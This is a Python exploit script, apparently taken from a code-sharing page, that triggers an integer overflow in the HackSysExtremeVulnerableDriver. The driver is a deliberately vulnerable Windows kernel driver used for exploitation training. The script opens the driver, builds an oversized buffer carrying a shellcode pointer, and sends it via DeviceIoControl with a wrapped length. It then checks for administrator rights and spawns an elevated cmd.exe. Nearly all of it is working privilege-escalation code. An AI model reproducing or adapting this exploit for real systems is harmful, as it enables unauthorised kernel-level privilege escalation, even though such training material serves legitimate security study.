def trigger_integer_overflow():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [-- BUFFER PADDING --][-- EXTRA PADDING --][-- SHELLCODE PTR --][-- STRING TERMINATOR --]
print "[+] Constructing overflow string"
evil_input = "A" * 0x800 + "BBBB" * 10 + struct.pack("<L",heap_alloc_payload()) + struct.pack("<L",0xBAD0B0B0)
evil_size = len(evil_input)
evil_input_ptr = id(evil_input) + 20
print "[+] Buf size: %d" % evil_size
einput = create_string_buffer(evil_input, evil_size)
print "[+] Triggering vuln .."
kernel32.DeviceIoControl(driver_handle, 0x222027, evil_input_ptr, 0xFFFFFFFF, None, 0,byref(dwReturn), None)
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_integeroverflow.py 文件源码
python
阅读 22
收藏 0
点赞 0
评论 0
评论列表
文章目录
